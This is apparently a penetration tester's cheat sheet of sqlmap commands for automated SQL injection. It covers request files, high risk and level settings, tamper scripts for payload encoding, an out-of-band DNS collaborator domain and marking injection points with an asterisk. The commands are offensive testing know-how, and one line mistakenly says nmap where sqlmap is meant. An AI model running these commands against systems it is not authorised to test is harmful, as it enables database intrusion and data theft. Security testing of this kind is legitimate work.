SQLmap
Automate SQL Injections
Documentation
https://github.com/sqlmapproject/sqlmap/wiki/Usage
From Request - HTTP:80
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
From Request - HTTPS:443
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080
or the http.request file needs to have special HTTP header Host: server:443
Batch Silent Mode without questions
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
DNS Collaborator (under root)
Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.
Use --dns-domain
switch to instruct nmap use DNS probes against your collaborator server
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
Tampering
Tampering scripts for payload encoding using --tamper
switch.
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode"
A list of all existing tampering scripts is available using --list-tampers
switch or looking at github repository /tamper folder
URL target & Parameters
sqlmap -u http://domain?id=1 -p id
You can read HTTP request from a file addressing payload by asterix symbol (*).
sqlmap -r ./sql.req
# sql.req is the following file containing HTTP request using asterix () for parameter injection
GET /path/to/username*
Host: servername:port
HTTP Proxy
sqlmap --proxy=http://127.0.0.1:8080
Databases
The most common DBMSs the remaining ones look at sqlmap wiki --dbms.
--dbms=mssql|mysql|postgresql|oracle
Base64 Encoding
By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name
sqlmap -u domain?p1=value --base64=p1
HTTP method - DELETE
sqlmap --method=DELETE -u http://domain -p param1
Last updated
Was this helpful?